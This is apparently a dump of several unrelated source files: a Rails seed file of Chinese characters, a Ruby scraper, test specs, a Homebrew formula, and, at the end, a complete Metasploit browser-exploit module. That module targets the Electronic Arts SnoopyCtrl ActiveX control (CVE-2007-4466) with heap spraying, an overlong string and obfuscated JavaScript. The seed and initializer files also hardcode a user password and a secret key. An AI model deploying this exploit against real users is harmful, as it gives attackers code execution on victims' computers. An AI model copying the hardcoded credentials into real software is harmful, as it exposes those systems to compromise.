simplified: "枣",
definition: "def",
created_at: "2018-10-28T12:11:28.124Z",
updated_at: "2018-10-28T12:11:28.124Z"
},
{
id: 68,
pinyin: "shèng",
simplified: "圣",
definition: "def",
created_at: "2018-10-28T12:11:31.539Z",
updated_at: "2018-10-28T12:11:31.539Z"
},
{
id: 69,
pinyin: "xìng",
simplified: "性",
definition: "def",
created_at: "2018-10-28T12:11:36.916Z",
updated_at: "2018-10-28T12:11:36.916Z"
},
{
id: 70,
pinyin: "quán",
simplified: "泉",
definition: "def",
created_at: "2018-10-28T12:11:41.416Z",
updated_at: "2018-10-28T12:11:41.416Z"
},
{
id: 71,
pinyin: "nǐ",
simplified: "拟",
definition: "def",
created_at: "2018-10-28T13:11:49.179Z",
updated_at: "2018-10-28T13:11:49.179Z"
},
{
id: 72,
pinyin: "wā",
simplified: "挖",
definition: "def",
created_at: "2018-10-28T13:11:52.224Z",
updated_at: "2018-10-28T13:11:52.224Z"
},
{
id: 73,
pinyin: "zhào",
simplified: "照",
definition: "def",
created_at: "2018-10-28T13:11:55.618Z",
updated_at: "2018-10-28T13:11:55.618Z"
},
{
id: 74,
pinyin: "dǎo",
simplified: "导",
definition: "def",
created_at: "2018-10-28T13:11:58.249Z",
updated_at: "2018-10-28T13:11:58.249Z"
},
{
id: 75,
pinyin: "bǔ",
simplified: "捕",
definition: "def",
created_at: "2018-10-28T13:12:00.533Z",
updated_at: "2018-10-28T13:12:00.533Z"
},
{
id: 76,
pinyin: "zǐ",
simplified: "紫",
definition: "def",
created_at: "2018-10-28T13:12:02.908Z",
updated_at: "2018-10-28T13:12:02.908Z"
},
{
id: 77,
pinyin: "shí",
simplified: "时",
definition: "def",
created_at: "2018-10-28T13:12:05.404Z",
updated_at: "2018-10-28T13:12:05.404Z"
},
{
id: 78,
pinyin: "fěn",
simplified: "粉",
definition: "def",
created_at: "2018-10-28T13:12:07.932Z",
updated_at: "2018-10-28T13:12:07.932Z"
},
{
id: 79,
pinyin: "páo",
simplified: "刨",
definition: "def",
created_at: "2018-10-28T13:12:12.394Z",
updated_at: "2018-10-28T13:12:12.394Z"
},
{
id: 80,
pinyin: "pāo",
simplified: "抛",
definition: "def",
created_at: "2018-10-28T13:12:15.377Z",
updated_at: "2018-10-28T13:12:15.377Z"
},
{
id: 81,
pinyin: "pēn",
simplified: "喷",
definition: "def",
created_at: "2018-10-28T13:12:22.148Z",
updated_at: "2018-10-28T13:12:22.148Z"
},
{
id: 82,
pinyin: "wǔ",
simplified: "武",
definition: "def",
created_at: "2018-10-28T13:21:46.510Z",
updated_at: "2018-10-28T13:21:46.510Z"
},
{
id: 83,
pinyin: "pěng",
simplified: "捧",
definition: "def",
created_at: "2018-10-28T13:21:50.353Z",
updated_at: "2018-10-28T13:21:50.353Z"
},
{
id: 84,
pinyin: "zhī",
simplified: "只",
definition: "def",
created_at: "2018-10-28T13:21:53.677Z",
updated_at: "2018-10-28T13:21:53.677Z"
},
{
id: 85,
pinyin: "hǒu",
simplified: "吼",
definition: "def",
created_at: "2018-10-28T13:22:00.821Z",
updated_at: "2018-10-28T13:22:00.821Z"
},
{
id: 86,
pinyin: "huò",
simplified: "霍",
definition: "def",
created_at: "2018-10-28T13:22:06.421Z",
updated_at: "2018-10-28T13:22:06.421Z"
},
{
id: 87,
pinyin: "guō",
simplified: "郭",
definition: "def",
created_at: "2018-10-28T13:22:15.692Z",
updated_at: "2018-10-28T13:22:15.692Z"
},
{
id: 88,
pinyin: "gǎng",
simplified: "岗",
definition: "def",
created_at: "2018-10-28T13:22:20.763Z",
updated_at: "2018-10-28T13:22:20.763Z"
},
{
id: 89,
pinyin: "gāng",
simplified: "纲",
definition: "def",
created_at: "2018-10-28T13:22:22.765Z",
updated_at: "2018-10-28T13:22:22.765Z"
},
{
id: 90,
pinyin: "fá",
simplified: "罚",
definition: "def",
created_at: "2018-10-28T13:22:30.623Z",
updated_at: "2018-10-28T13:22:30.623Z"
},
{
id: 91,
pinyin: "zhēng",
simplified: "争",
definition: "def",
created_at: "2018-10-28T13:22:45.869Z",
updated_at: "2018-10-28T13:22:45.869Z"
},
{
id: 92,
pinyin: "shé",
simplified: "蛇",
definition: "def",
created_at: "2018-10-28T13:22:58.212Z",
updated_at: "2018-10-28T13:22:58.212Z"
},
{
id: 93,
pinyin: "là",
simplified: "蜡",
definition: "def",
created_at: "2018-10-28T13:23:04.123Z",
updated_at: "2018-10-28T13:23:04.123Z"
},
{
id: 94,
pinyin: "ni",
simplified: 'null',
definition: "def",
created_at: "2018-10-28T13:40:12.820Z",
updated_at: "2018-10-28T13:40:12.820Z"
},
{
id: 95,
pinyin: "shǐ",
simplified: "使",
definition: "def",
created_at: "2018-10-28T13:46:18.544Z",
updated_at: "2018-10-28T13:46:18.544Z"
},
{
id: 96,
pinyin: "gē",
simplified: "歌",
definition: "def",
created_at: "2018-10-28T13:46:29.120Z",
updated_at: "2018-10-28T13:46:29.120Z"
},
{
id: 97,
pinyin: "suǒ",
simplified: "索",
definition: "def",
created_at: "2018-10-28T13:46:33.252Z",
updated_at: "2018-10-28T13:46:33.252Z"
},
{
id: 98,
pinyin: "gòng",
simplified: "共",
definition: "def",
created_at: "2018-10-28T13:46:39.014Z",
updated_at: "2018-10-28T13:46:39.014Z"
},
{
id: 99,
pinyin: "gē",
simplified: "哥",
definition: "def",
created_at: "2018-10-28T13:48:49.592Z",
updated_at: "2018-10-28T13:48:49.592Z"
},
{
id: 100,
pinyin: "fá",
simplified: "伐",
definition: "def",
created_at: "2018-10-28T13:48:58.369Z",
updated_at: "2018-10-28T13:48:58.369Z"
},
{
id: 101,
pinyin: "lòu",
simplified: "陋",
definition: "def",
created_at: "2018-10-28T13:49:01.220Z",
updated_at: "2018-10-28T13:49:01.220Z"
},
{
id: 102,
pinyin: "qì",
simplified: "器",
definition: "def",
created_at: "2018-10-28T13:49:05.744Z",
updated_at: "2018-10-28T13:49:05.744Z"
},
{
id: 103,
pinyin: "chéng",
simplified: "乘",
definition: "def",
created_at: "2018-10-28T13:49:09.021Z",
updated_at: "2018-10-28T13:49:09.021Z"
},
{
id: 104,
pinyin: "fán",
simplified: "凡",
definition: "def",
created_at: "2018-10-28T13:49:15.549Z",
updated_at: "2018-10-28T13:49:15.549Z"
},
{
id: 105,
pinyin: "jiǎo",
simplified: "脚",
definition: "def",
created_at: "2018-10-28T13:49:20.828Z",
updated_at: "2018-10-28T13:49:20.828Z"
},
{
id: 106,
pinyin: "fù",
simplified: "富",
definition: "def",
created_at: "2018-10-28T13:49:30.548Z",
updated_at: "2018-10-28T13:49:30.548Z"
},
{
id: 107,
pinyin: "zāo",
simplified: "糟",
definition: "def",
created_at: "2018-10-28T13:49:33.451Z",
updated_at: "2018-10-28T13:49:33.451Z"
},
{
id: 108,
pinyin: "xīn",
simplified: "新",
definition: "def",
created_at: "2018-10-28T13:49:41.902Z",
updated_at: "2018-10-28T13:49:41.902Z"
},
{
id: 109,
pinyin: "rě",
simplified: "惹",
definition: "def",
created_at: "2018-10-28T13:49:49.284Z",
updated_at: "2018-10-28T13:49:49.284Z"
},
{
id: 110,
pinyin: "zhēn",
simplified: "针",
definition: "def",
created_at: "2018-10-28T13:59:03.409Z",
updated_at: "2018-10-28T13:59:03.409Z"
},
{
id: 111,
pinyin: "qū",
simplified: "曲",
definition: "def",
created_at: "2018-10-28T13:59:09.884Z",
updated_at: "2018-10-28T13:59:09.884Z"
},
{
id: 112,
pinyin: "zěn",
simplified: "怎",
definition: "def",
created_at: "2018-10-28T13:59:22.227Z",
updated_at: "2018-10-28T13:59:22.227Z"
},
{
id: 113,
pinyin: "mā",
simplified: "妈",
definition: "def",
created_at: "2018-10-28T13:59:25.611Z",
updated_at: "2018-10-28T13:59:25.611Z"
},
{
id: 114,
pinyin: "qiǎng",
simplified: "抢",
definition: "def",
created_at: "2018-10-28T13:59:33.316Z",
updated_at: "2018-10-28T13:59:33.316Z"
},
{
id: 115,
pinyin: "qiāng",
simplified: "枪",
definition: "def",
created_at: "2018-10-28T13:59:42.993Z",
updated_at: "2018-10-28T13:59:42.993Z"
},
{
id: 116,
pinyin: "xiào",
simplified: "校",
definition: "def",
created_at: "2018-10-28T13:59:56.428Z",
updated_at: "2018-10-28T13:59:56.428Z"
},
{
id: 117,
pinyin: "péi",
simplified: "陪",
definition: "def",
created_at: "2018-10-28T14:00:08.122Z",
updated_at: "2018-10-28T14:00:08.122Z"
},
{
id: 118,
pinyin: "fèng",
simplified: "凤",
definition: "def",
created_at: "2018-10-28T14:00:11.339Z",
updated_at: "2018-10-28T14:00:11.339Z"
},
{
id: 119,
pinyin: "ā",
simplified: "啊",
definition: "def",
created_at: "2018-10-28T14:05:40.283Z",
updated_at: "2018-10-28T14:05:40.283Z"
},
{
id: 120,
pinyin: "fēng",
simplified: "疯",
definition: "def",
created_at: "2018-10-28T14:07:54.939Z",
updated_at: "2018-10-28T14:07:54.939Z"
},
{
id: 121,
pinyin: "tiāo",
simplified: "挑",
definition: "def",
created_at: "2018-10-28T14:07:59.037Z",
updated_at: "2018-10-28T14:07:59.037Z"
},
{
id: 122,
pinyin: "shèng",
simplified: "胜",
definition: "def",
created_at: "2018-10-28T14:08:04.890Z",
updated_at: "2018-10-28T14:08:04.890Z"
},
{
id: 123,
pinyin: "fān",
simplified: "翻",
definition: "def",
created_at: "2018-10-28T14:08:10.372Z",
updated_at: "2018-10-28T14:08:10.372Z"
},
{
id: 124,
pinyin: "lí",
simplified: "离",
definition: "def",
created_at: "2018-10-28T14:08:14.080Z",
updated_at: "2018-10-28T14:08:14.080Z"
},
{
id: 125,
pinyin: "zòu",
simplified: "奏",
definition: "def",
created_at: "2018-10-28T14:08:17.072Z",
updated_at: "2018-10-28T14:08:17.072Z"
},
{
id: 126,
pinyin: "hé",
simplified: "盒",
definition: "def",
created_at: "2018-10-28T14:08:20.640Z",
updated_at: "2018-10-28T14:08:20.640Z"
},
{
id: 127,
pinyin: "tuǒ",
simplified: "妥",
definition: "def",
created_at: "2018-10-28T14:08:27.254Z",
updated_at: "2018-10-28T14:08:27.254Z"
},
{
id: 128,
pinyin: "qīng",
simplified: "轻",
definition: "def",
created_at: "2018-10-28T14:08:32.788Z",
updated_at: "2018-10-28T14:08:32.788Z"
},
{
id: 129,
pinyin: "ǎn",
simplified: "俺",
definition: "def",
created_at: "2018-10-28T14:08:36.183Z",
updated_at: "2018-10-28T14:08:36.183Z"
},
{
id: 130,
pinyin: "fāng",
simplified: "芳",
definition: "def",
created_at: "2018-10-28T14:08:59.609Z",
updated_at: "2018-10-28T14:08:59.609Z"
},
{
id: 131,
pinyin: "ē",
simplified: "阿",
definition: "def",
created_at: "2018-10-30T02:19:52.348Z",
updated_at: "2018-10-30T02:19:52.348Z"
},
{
id: 132,
pinyin: "斯ē,sī",
simplified: "阿",
definition: "def",
created_at: "2018-10-30T02:28:12.564Z",
updated_at: "2018-10-30T02:28:12.564Z"
},
{
id: 133,
pinyin: "kě",
simplified: "可",
definition: "def",
created_at: "2018-10-30T03:15:01.913Z",
updated_at: "2018-10-30T03:15:01.913Z"
},
{
id: 134,
pinyin: "hái",
simplified: "还",
definition: "def",
created_at: "2018-10-30T03:45:10.836Z",
updated_at: "2018-10-30T03:45:10.836Z"
},
{
id: 135,
pinyin: "倪",
simplified: "倪",
definition: "def",
created_at: "2018-10-30T03:52:47.527Z",
updated_at: "2018-10-30T03:52:47.527Z"
},
{
id: 136,
pinyin: "ní",
simplified: "泥",
definition: "def",
created_at: "2018-10-30T03:52:48.373Z",
updated_at: "2018-10-30T03:52:48.373Z"
},
{
id: 137,
pinyin: "hē",
simplified: "喝",
definition: "def",
created_at: "2018-11-05T23:32:41.014Z",
updated_at: "2018-11-05T23:32:41.014Z"
},
{
id: 138,
pinyin: "hé",
simplified: "合",
definition: "def",
created_at: "2018-11-05T23:32:41.368Z",
updated_at: "2018-11-05T23:32:41.368Z"
},
{
id: 139,
pinyin: "hé",
simplified: "河",
definition: "def",
created_at: "2018-11-05T23:32:41.764Z",
updated_at: "2018-11-05T23:32:41.764Z"
},
{
id: 140,
pinyin: "hé",
simplified: "核",
definition: "def",
created_at: "2018-11-05T23:32:42.452Z",
updated_at: "2018-11-05T23:32:42.452Z"
},
{
id: 141,
pinyin: "hè",
simplified: "贺",
definition: "def",
created_at: "2018-11-05T23:32:42.840Z",
updated_at: "2018-11-05T23:32:42.840Z"
},
{
id: 142,
pinyin: "nà",
simplified: "那",
definition: "def",
created_at: "2018-11-14T01:20:52.963Z",
updated_at: "2018-11-14T01:20:52.963Z"
},
{
id: 143,
pinyin: " nà, ",
simplified: "那",
definition: "def",
created_at: "2018-11-14T01:22:39.325Z",
updated_at: "2018-11-14T01:22:39.325Z"
},
{
id: 144,
pinyin: "ná",
simplified: "拿",
definition: "def",
created_at: "2018-11-14T01:22:39.945Z",
updated_at: "2018-11-14T01:22:39.945Z"
},
{
id: 145,
pinyin: "nǎ",
simplified: "哪",
definition: "def",
created_at: "2018-11-14T01:22:40.381Z",
updated_at: "2018-11-14T01:22:40.381Z"
},
{
id: 146,
pinyin: "nà",
simplified: "纳",
definition: "def",
created_at: "2018-11-14T01:22:40.883Z",
updated_at: "2018-11-14T01:22:40.883Z"
},
{
id: 147,
pinyin: "nà",
simplified: "呐",
definition: "def",
created_at: "2018-11-14T01:22:41.536Z",
updated_at: "2018-11-14T01:22:41.536Z"
},
{
id: 148,
pinyin: "nà",
simplified: "钠",
definition: "def",
created_at: "2018-11-14T01:22:42.099Z",
updated_at: "2018-11-14T01:22:42.099Z"
},
{
id: 149,
pinyin: "shì",
simplified: "是",
definition: "def",
created_at: "2018-11-14T01:29:23.611Z",
updated_at: "2018-11-14T01:29:23.611Z"
},
{
id: 150,
pinyin: "shì",
simplified: "市",
definition: "def",
created_at: "2018-11-14T01:29:25.155Z",
updated_at: "2018-11-14T01:29:25.155Z"
},
{
id: 151,
pinyin: "yóu",
simplified: "由",
definition: "def",
created_at: "2018-11-14T01:29:30.123Z",
updated_at: "2018-11-14T01:29:30.123Z"
},
{
id: 152,
pinyin: "yóu",
simplified: "油",
definition: "def",
created_at: "2018-11-14T01:29:30.553Z",
updated_at: "2018-11-14T01:29:30.553Z"
},
{
id: 153,
pinyin: "shì",
simplified: "事",
definition: "def",
created_at: "2018-11-14T02:10:57.936Z",
updated_at: "2018-11-14T02:10:57.936Z"
},
{
id: 154,
pinyin: "shì",
simplified: "式",
definition: "def",
created_at: "2018-11-14T02:11:04.946Z",
updated_at: "2018-11-14T02:11:04.946Z"
},
{
id: 155,
pinyin: "shí",
simplified: "石",
definition: "def",
created_at: "2018-11-14T02:11:05.426Z",
updated_at: "2018-11-14T02:11:05.426Z"
},
{
id: 156,
pinyin: "FAF",
simplified: "A",
definition: "def",
created_at: "2018-11-24T07:04:23.283Z",
updated_at: "2018-11-24T07:04:23.283Z"
},
{
id: 157,
pinyin: "nián",
simplified: "年",
definition: "def",
created_at: "2018-12-04T14:43:13.133Z",
updated_at: "2018-12-04T14:43:13.133Z"
},
{
id: 158,
pinyin: "nèi",
simplified: "内",
definition: "def",
created_at: "2018-12-04T14:43:15.441Z",
updated_at: "2018-12-04T14:43:15.441Z"
},
{
id: 159,
pinyin: "nín",
simplified: "您",
definition: "def",
created_at: "2018-12-04T14:43:15.997Z",
updated_at: "2018-12-04T14:43:15.997Z"
},
{
id: 160,
pinyin: "hǎo",
simplified: "好",
definition: "def",
created_at: "2018-12-04T14:43:21.844Z",
updated_at: "2018-12-04T14:43:21.844Z"
},
{
id: 161,
pinyin: "hào",
simplified: "号",
definition: "def",
created_at: "2018-12-04T14:43:22.401Z",
updated_at: "2018-12-04T14:43:22.401Z"
},
{
id: 162,
pinyin: "hào",
simplified: "耗",
definition: "def",
created_at: "2018-12-04T14:43:22.828Z",
updated_at: "2018-12-04T14:43:22.828Z"
},
{
id: 163,
pinyin: "nì",
simplified: "腻",
definition: "def",
created_at: "2018-12-04T14:47:37.488Z",
updated_at: "2018-12-04T14:47:37.488Z"
},
{
id: 164,
pinyin: "hú",
simplified: "胡",
definition: "def",
created_at: "2018-12-04T15:00:06.926Z",
updated_at: "2018-12-04T15:00:06.926Z"
},
{
id: 165,
pinyin: "hǔ",
simplified: "虎",
definition: "def",
created_at: "2018-12-04T15:00:07.317Z",
updated_at: "2018-12-04T15:00:07.317Z"
},
{
id: 166,
pinyin: "hù",
simplified: "户",
definition: "def",
created_at: "2018-12-04T15:00:08.075Z",
updated_at: "2018-12-04T15:00:08.075Z"
},
{
id: 167,
pinyin: "hú",
simplified: "湖",
definition: "def",
created_at: "2018-12-04T15:00:08.452Z",
updated_at: "2018-12-04T15:00:08.452Z"
},
{
id: 168,
pinyin: "hū",
simplified: "乎",
definition: "def",
created_at: "2018-12-04T15:00:08.832Z",
updated_at: "2018-12-04T15:00:08.832Z"
},
{
id: 169,
pinyin: "hū",
simplified: "呼",
definition: "def",
created_at: "2018-12-04T15:00:09.255Z",
updated_at: "2018-12-04T15:00:09.255Z"
},
{
id: 170,
pinyin: "hù",
simplified: "互",
definition: "def",
created_at: "2018-12-04T15:00:09.673Z",
updated_at: "2018-12-04T15:00:09.673Z"
},
{
id: 171,
pinyin: "hù",
simplified: "护",
definition: "def",
created_at: "2018-12-04T15:00:10.541Z",
updated_at: "2018-12-04T15:00:10.541Z"
},
{
id: 172,
pinyin: "ér",
simplified: "而",
definition: "def",
created_at: "2018-12-04T15:03:44.757Z",
updated_at: "2018-12-04T15:03:44.757Z"
},
{
id: 173,
pinyin: "èr",
simplified: "二",
definition: "def",
created_at: "2018-12-04T15:03:45.120Z",
updated_at: "2018-12-04T15:03:45.120Z"
},
{
id: 174,
pinyin: "ér",
simplified: "儿",
definition: "def",
created_at: "2018-12-04T15:03:45.556Z",
updated_at: "2018-12-04T15:03:45.556Z"
},
{
id: 175,
pinyin: "ěr",
simplified: "尔",
definition: "def",
created_at: "2018-12-04T15:03:45.963Z",
updated_at: "2018-12-04T15:03:45.963Z"
},
{
id: 176,
pinyin: "ěr",
simplified: "耳",
definition: "def",
created_at: "2018-12-04T15:03:46.415Z",
updated_at: "2018-12-04T15:03:46.415Z"
},
{
id: 177,
pinyin: "èr",
simplified: "贰",
definition: "def",
created_at: "2018-12-04T15:03:46.850Z",
updated_at: "2018-12-04T15:03:46.850Z"
},
{
id: 178,
pinyin: "ěr",
simplified: "饵",
definition: "def",
created_at: "2018-12-04T15:03:47.279Z",
updated_at: "2018-12-04T15:03:47.279Z"
}
]
quizzes = [
{
user_id:1,
title:'midterm 301a review'
},
{
user_id:1,
title:'Amy Review'
},
{
user_id:1,
title:'Jacob Review'
},
{
user_id:1,
title:'405A Final'
},
{
user_id:1,
title:'weekly quiz'
},
{
user_id:1,
title:'random test'
},
{
user_id:1,
title:'midterm 301b review'
}
]
quiz_chars = [
{
},
]
User.create(username: 'gardiner', password: 'xiezi')
characters.each do |char|
  Character.create(pinyin: char[:pinyin], simplified: char[:simplified], definition: char[:definition])
end
quizzes.each do |quiz|
  Quiz.create(user_id: quiz[:user_id], title: quiz[:title])
end
Character.all.each_with_index do |char, index|
  # Link each character to one of the seven quizzes, referencing its actual record id.
  QuizChar.create(quiz_id: index % 7 + 1, character_id: char.id)
end
| 18 | 111 | 0.662031 |
b9bc4409aa0854a4342e5b51385e33067855fee0 | 457 | module Xxx
class Youporn
HOST = "youporn.com"
URI = "http://#{HOST}"
BROWSE_TIME_PATH = "/browse/time"
ENTER_WEBSITE = lambda { |page| page.forms.first.click_button }
def agent
@agent ||= Mechanize.new
end
def latest
agent.get(uri(BROWSE_TIME_PATH), &ENTER_WEBSITE)
path = agent.page.links_with(:href => /watch/).first.href
uri(path)
end
def uri(path)
"#{URI}#{path}"
end
end
end
| 19.869565 | 67 | 0.601751 |
ff1c48fd7c3425b6df241a178aa2daf181a78823 | 659 | # Be sure to restart your server when you modify this file.
# Your secret key is used for verifying the integrity of signed cookies.
# If you change this key, all old signed cookies will become invalid!
# Make sure the secret is at least 30 characters and all random,
# no regular words or you'll be exposed to dictionary attacks.
# You can use `rake secret` to generate a secure secret key.
# Make sure your secret_key_base is kept private
# if you're sharing your code publicly.
Dummy::Application.config.secret_key_base = '4f77edbdf832c10f002e96519db1ffa049c259538a985d737607d6640f1d62fb168f95c9ee50ab1ac9df5041f02ef8f469742303a5ea809af876210817762e9d'
| 50.692308 | 174 | 0.814871 |
1d495f9ed747e859bf1cbf5a1eb7afbdd4b3d095 | 1,439 | # require 'rails_helper'
# describe "On the login page" do
# describe "a user that is not logged in" do
# it "should be able to sign up or log in as a student or teacher" do
# visit '/'
# expect(page).to have_link('', href:"/auth/teacher_login")
# expect(page).to have_link('', href:"/auth/teacher_signup")
# expect(page).to have_link('', href:"/auth/student_login")
# expect(page).to have_link('', href:"/auth/student_signup")
# end
# end
# describe "a user who is logged in as a teacher" do
# before do
# teacher = Teacher.create(first_name: 'test', last_name: 'test',
# email: '[email protected]', password: 'test')
# page.set_rack_session(:user_id => teacher.id)
# page.set_rack_session(:user_type => 'teacher')
# end
# it "should be redirected to the ember app" do
# visit '/'
# expect(page).to have_css('div#ember-app')
# end
# end
# describe "a user who is logged in as a student" do
# before do
# student = Student.create(first_name: 'test', last_name: 'test',
# username: 'test', password: 'test')
# page.set_rack_session(:user_id => student.id)
# page.set_rack_session(:user_type => 'student')
# end
# it "should be redirected to the ember app" do
# visit '/'
# expect(page).to have_css('div#ember-app')
# end
# end
# end
| 32.704545 | 74 | 0.591383 |
bf1423ffe50fc177b72f73a650311fd3269aa74d | 1,870 | require "rails_helper"
RSpec.describe "Session API", type: :request do
describe "GET /auth/logged_in" do
context "when user is not logged in" do
before { get "/api/v1/auth/logged_in" }
it "returns logged_in false" do
expect(json["payload"]["logged_in"]).to eq(false)
end
it "returns status code 200" do
expect(response).to have_http_status(200)
end
end
end
describe "GET /auth/logout" do
context "logout user" do
before { delete "/api/v1/auth/logout" }
it "returns logged_in false" do
expect(json["logged_in"]).to eq(false)
end
it "returns status code 200" do
expect(response).to have_http_status(200)
end
end
end
describe "POST /auth/login" do
new_user_details = {
email: "[email protected]",
password: "testpassword"
}
let!(:new_user) do
create :user,
email: new_user_details[:email],
password: new_user_details[:password]
end
let(:valid_credentials) do
{
email: new_user_details[:email],
password: new_user_details[:password]
}
end
context "login credentials are valid" do
before { post "/api/v1/auth/login", params: valid_credentials }
it "returns user details" do
expect(json["payload"]["email"]).to eq(new_user[:email])
end
it "returns 200 status" do
expect(response).to have_http_status(200)
end
after { get "/api/v1/auth/logged_in" }
end
context "login credentials are invalid" do
before { post "/api/v1/auth/login", params: {} }
it "returns invalid request" do
expect(json["errors"]["global"]).to eq("Incorrect Email or Password")
end
it "returns 400 status" do
expect(response).to have_http_status(400)
end
end
end
end
| 25.27027 | 77 | 0.613904 |
ff0d80e6abdbf82e135b51822a40cf3078374fcc | 121 | json.array! @suggested_alternatives, partial: "suggested_alternatives/suggested_alternative", as: :suggested_alternative
| 60.5 | 120 | 0.859504 |
abe95f5c44d432d67a04f910c8ec0e63ea2c8f87 | 1,316 | # frozen_string_literal: true
class SnippetBlobPresenter < BlobPresenter
include GitlabRoutingHelper
def rich_data
return unless blob.rich_viewer
render_rich_partial
end
def plain_data
return if blob.binary?
highlight(plain: false)
end
def raw_path
snippet_blob_raw_route(only_path: true)
end
def raw_url
snippet_blob_raw_route
end
private
def snippet_multiple_files?
blob.container.repository_exists? && Feature.enabled?(:snippet_multiple_files, current_user)
end
def snippet
blob.container
end
def language
nil
end
def render_rich_partial
renderer.render("projects/blob/viewers/_#{blob.rich_viewer.partial_name}",
locals: { viewer: blob.rich_viewer, blob: blob, blob_raw_path: raw_path, blob_raw_url: raw_url },
layout: false)
end
def renderer
proxy = Warden::Proxy.new({}, Warden::Manager.new({})).tap do |proxy_instance|
proxy_instance.set_user(current_user, scope: :user)
end
ApplicationController.renderer.new('warden' => proxy)
end
def snippet_blob_raw_route(only_path: false)
return gitlab_raw_snippet_blob_url(snippet, blob.path, only_path: only_path) if snippet_multiple_files?
gitlab_raw_snippet_url(snippet, only_path: only_path)
end
end
| 21.933333 | 117 | 0.724924 |
ab0a23727bc89b82e973f3aa351d805c88ebd44d | 831 | class Ddate < Formula
desc "Converts boring normal dates to fun Discordian Date"
homepage "https://github.com/bo0ts/ddate"
url "https://github.com/bo0ts/ddate/archive/v0.2.2.tar.gz"
sha256 "d53c3f0af845045f39d6d633d295fd4efbe2a792fd0d04d25d44725d11c678ad"
bottle do
cellar :any
sha256 "8b7017ecb63545d996e06008df12e7cbd3b9da90545d2accb5ebf28c6af4f088" => :mavericks
sha256 "91f1bb80f8fdf4fd994fba1cddafc94a17b2daa0f8a5483735a8dc38c9eda5f1" => :mountain_lion
sha256 "12b52e2c5881c51aa902c10b236dc6c2e42e9d4b7e666f19b86a86bf211e398a" => :lion
end
def install
system ENV.cc, "ddate.c", "-o", "ddate"
bin.install "ddate"
man1.install "ddate.1"
end
test do
output = shell_output("#{bin}/ddate 20 6 2014").strip
assert_equal "Sweetmorn, Confusion 25, 3180 YOLD", output
end
end
| 33.24 | 95 | 0.758123 |
877bf8e43af83d7164aff87751d345b2ac954ba7 | 2,367 | require 'spec_helper'
RSpec.describe 'Coinfield integration specs' do
let(:client) { Cryptoexchange::Client.new }
let(:btc_cad_pair) { Cryptoexchange::Models::MarketPair.new(base: 'BTC', target: 'CAD', market: 'coinfield') }
it 'fetch pairs' do
pairs = client.pairs('coinfield')
expect(pairs).not_to be_empty
pair = pairs.first
expect(pair.base).to_not be nil
expect(pair.target).to_not be nil
expect(pair.market).to eq 'coinfield'
end
it 'give trade url' do
trade_page_url = client.trade_page_url 'coinfield', base: btc_cad_pair.base, target: btc_cad_pair.target
expect(trade_page_url).to eq "https://trade.coinfield.com/pro/trade/BTC-CAD"
end
it 'fetch ticker' do
ticker = client.ticker(btc_cad_pair)
expect(ticker.base).to eq btc_cad_pair.base
expect(ticker.target).to eq btc_cad_pair.target
expect(ticker.market).to eq btc_cad_pair.market
expect(ticker.ask).to be_a Numeric
expect(ticker.bid).to be_a Numeric
expect(ticker.high).to be_a Numeric
expect(ticker.low).to be_a Numeric
expect(ticker.last).to be_a Numeric
expect(ticker.volume).to be_a Numeric
expect(ticker.timestamp).to be_a Numeric
expect(2000..Date.today.year).to include(Time.at(ticker.timestamp).year)
expect(ticker.payload).to_not be nil
end
it 'fetch order book' do
order_book = client.order_book(btc_cad_pair)
expect(order_book.base).to eq 'BTC'
expect(order_book.target).to eq 'CAD'
expect(order_book.market).to eq 'coinfield'
expect(order_book.asks).to_not be_empty
expect(order_book.bids).to_not be_empty
expect(order_book.asks.first.price).to_not be_nil
expect(order_book.bids.first.amount).to_not be_nil
expect(order_book.bids.first.timestamp).to be_nil
expect(order_book.timestamp).to be_a Numeric
expect(order_book.payload).to_not be nil
end
it 'fetch trade' do
trades = client.trades(btc_cad_pair)
trade = trades.sample
expect(trades).to_not be_empty
expect(trade.trade_id).to_not be_nil
expect(trade.base).to eq 'BTC'
expect(trade.target).to eq 'CAD'
expect(trade.type).to be_nil
expect(trade.price).to be_a Numeric
expect(trade.amount).to be_a Numeric
expect(trade.timestamp).to be_a Numeric
expect(trade.payload).to_not be nil
expect(trade.market).to eq 'coinfield'
end
end
| 34.304348 | 112 | 0.724968 |
d5688a3fb75861d657c970553a203c4a91027fb2 | 2,760 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl
          ActiveX Control (NPSnpy.dll 1.1.0.36). When sending an overly long
string to the CheckRequirements() method, an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'References' =>
[
[ 'CVE', '2007-4466' ],
[ 'OSVDB', '37723'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]
],
'DisclosureDate' => 'Oct 8 2007',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or al, 12").encode_string * 2)
js = %Q|
try {
var evil_string = "";
var index;
var vulnerable = new ActiveXObject('SnoopyX.SnoopyCtrl.1');
var my_unescape = unescape;
var shellcode = '#{shellcode}';
#{js_heap_spray}
sprayHeap(my_unescape(shellcode), 0x0c0c0c0c, 0x40000);
for (index = 0; index < 5000; index++) {
evil_string = evil_string + my_unescape('#{ret}');
}
vulnerable.CheckRequirements(evil_string);
} catch( e ) { window.location = 'about:blank' ; }
|
opts = {
'Strings' => true,
'Symbols' => {
'Variables' => [
'vulnerable',
'shellcode',
'my_unescape',
'index',
'evil_string',
]
}
}
js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
js.update_opts(js_heap_spray.opts)
js.obfuscate()
content = %Q|<html>
<body>
<script><!--
#{js}
//</script>
</body>
</html>
|
print_status("Sending #{self.name}")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
